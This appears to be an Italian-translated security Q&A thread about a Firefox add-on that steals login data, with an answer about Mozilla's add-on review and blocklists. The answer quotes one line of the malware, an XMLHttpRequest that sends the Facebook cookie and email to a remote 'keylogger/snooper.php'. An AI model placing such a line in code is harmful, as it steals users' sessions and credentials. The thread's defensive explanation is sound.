Come utilizzare in modo sicuro il componente aggiuntivo di Firefox per evitare di rubare i dati?

0

Alcuni video su YouTube dimostrano come un'estensione di Firefox può raccogliere informazioni di accesso utilizzate per accedere a siti Web come Facebook.

Dopo aver installato questo strumento / malware come componente aggiuntivo di Firefox, ho osservato l'attività del mio browser usando Firebug. Il mio nome utente e password sono stati inviati a un server tramite richiesta Ajax.

Ho contattato l'autore. Ha detto che può incorporare questo script in qualsiasi componente aggiuntivo di Firefox.

Come posso utilizzare in sicurezza i componenti aggiuntivi di Firefox? Ho installato 3 tipi di antivirus e firewall. Ma nessuno di questi è stato in grado di rilevare questo malware.

    
posta ebola virus 04.08.2012 - 10:02
fonte

1 risposta

4

Come ti proteggi

Gli addon di Firefox dal sito ufficiale vengono sottoposti al processo di revisione dei componenti aggiuntivi link

Quindi puoi verificare se un addon è ufficiale ed è stato revisionato prima dell'installazione.

Non è al 100% È possibile trovare un elenco di componenti aggiuntivi bloccati rimosso da Mozilla a causa di determinati motivi (virus, trojan, ecc.) link

Installare un addon da una terza parte è più pericoloso, quindi potresti aver bisogno di controllare personalmente il codice sorgente (che è possibile dato che si tratta di un file zip di file javascript) o fidarti dell'autore / fornitore.

Come funziona il malware?

Il file .xul contiene la seguente riga di codice:

xhr.open("GET", 
      "http://www.removedurl.com/keylogger/snooper.php?
       facebook="+cookie+'&email='+email, true);

Quindi quando testi questo script sul tuo account, gli invierà la tua password. Per questo motivo dovresti eliminare questo add-on e cambiare la tua password.

    
risposta data 04.08.2012 - 13:01
fonte

Leggi altre domande sui tag